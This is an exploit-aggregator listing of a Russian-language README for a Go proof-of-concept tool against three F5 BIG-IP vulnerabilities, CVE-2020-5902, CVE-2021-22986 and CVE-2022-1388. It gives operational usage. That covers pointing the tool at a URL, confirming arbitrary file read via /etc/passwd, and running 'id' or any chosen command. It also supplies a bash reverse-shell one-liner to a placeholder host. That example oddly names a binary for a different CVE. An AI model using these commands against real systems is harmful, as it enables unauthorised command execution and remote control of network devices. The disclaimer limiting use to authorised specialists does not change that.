Sploitus

Exploit for F5-BIG-IP-POC

kitploit · 2026-08-30

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WEST9B-F5-BIG-IP-POC
# F5-BIG-IP POC

Набор POC для CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 на языке Go. В дальнейшем будут добавлены другие POC для F5.

author:160team.west9B

**Только для использования авторизованными специалистами по безопасности. Соблюдайте закон о кибербезопасности. Любые последствия — на вашей ответственности, автор к ним отношения не имеет.**

# 01-Основное описание

Набор POC для F5:

CVE-2020-5902: F5 BIG-IP — уязвимость удалённого выполнения кода

CVE-2021-22986: F5 BIG-IP iControl REST — уязвимость неавторизованного удалённого выполнения команд

CVE-2022-1388: обход аутентификации и удалённое выполнение команд

# 02-Инструкция по использованию

## Использование: ./F5-BIG-IP -u url

CVE-2020-5902 проверяется через произвольное скачивание файлов: если возвращается /etc/passwd, уязвимость существует.

CVE-2021-22986, CVE-2022-1388: POC по умолчанию выполняет команду id; если возвращается {id}, уязвимость существует. Можно указать свою команду с помощью -c.

## Обратная оболочка (reverse shell)

Использование: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

# Скриншоты